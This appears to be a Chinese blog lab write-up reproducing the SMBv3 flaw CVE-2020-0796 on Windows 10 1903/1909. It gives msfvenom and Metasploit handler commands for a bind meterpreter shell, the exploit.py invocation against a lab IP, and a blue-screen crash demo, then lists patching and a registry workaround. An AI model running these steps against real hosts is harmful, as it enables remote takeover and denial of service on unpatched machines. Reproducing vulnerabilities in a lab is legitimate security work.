CVE-2020-0796(永恒之黑)漏洞复现Getshell

MySQL数据库从入门到实战应用


CVE-­2020­-0796漏洞复现

  • CVE-­2020­-0796
  • 受影响的系统版本
  • 环境搭建
  • 漏洞检测-扫描
  • 漏洞复现-返回会话
  • 漏洞复现-蓝屏攻击
  • 视频演示
  • 漏洞修复

CVE-­2020­-0796

Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。

受影响的系统版本

适用于32位系统的Windows 10版本1903
Windows 10 1903版(用于基于x64的系统)
Windows 10 1903版(用于基于ARM64的系统)
Windows Server 1903版(服务器核心安装)
适用于32位系统的Windows 10版本1909
Windows 10版本1909(用于基于x64的系统)
Windows 10 1909版(用于基于ARM64的系统)
Windows Server版本1909(服务器核心安装)

环境搭建

我用的是VMware搭建
CVE-2020-0796(永恒之黑)漏洞复现Getshell_第1张图片
环境版本信息
CVE-2020-0796(永恒之黑)漏洞复现Getshell_第2张图片

漏洞检测-扫描

工具下载:
CSDN
GitHub
在这里插入图片描述

漏洞复现-返回会话

工具下载:
CSDN
GItHub
该Exp使用python3
1.启动msf
使用msf生成shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt

CVE-2020-0796(永恒之黑)漏洞复现Getshell_第3张图片
执行该命令后会在桌面生成一个shellcode.txt
将生成的shellcode替换exp中的exploit.py中的USER_PAYLOAD保存即可。CVE-2020-0796(永恒之黑)漏洞复现Getshell_第4张图片
2.使用kaili中的msf开启监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp #设置反弹模式
msf5 exploit(multi/handler) > set rhost 172.18.9.24
msf5 exploit(multi/handler) > set lport 3333 #设置监听端口 端口需与上面生成的shellcode一致
msf5 exploit(multi/handler) > run
CVE-2020-0796(永恒之黑)漏洞复现Getshell_第5张图片
3.在kali Exp文件夹下执行
python3 exploit.py -ip 172.18.9.24
CVE-2020-0796(永恒之黑)漏洞复现Getshell_第6张图片
4.获得会话 复现成功CVE-2020-0796(永恒之黑)漏洞复现Getshell_第7张图片CVE-2020-0796(永恒之黑)漏洞复现Getshell_第8张图片
CVE-2020-0796(永恒之黑)漏洞复现Getshell_第9张图片

漏洞复现-蓝屏攻击

工具下载
CSDN
CVE-2020-0796(永恒之黑)漏洞复现Getshell_第10张图片
目标主机蓝屏
CVE-2020-0796(永恒之黑)漏洞复现Getshell_第11张图片

视频演示

视频跳转

cve-2020-0796漏洞复现获取会话

漏洞修复

下载补丁并安装补丁链接
也可以使用PowerShell命令禁用SMBv3服务的压缩
Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 1 –Force

你可能感兴趣的:(漏洞复现)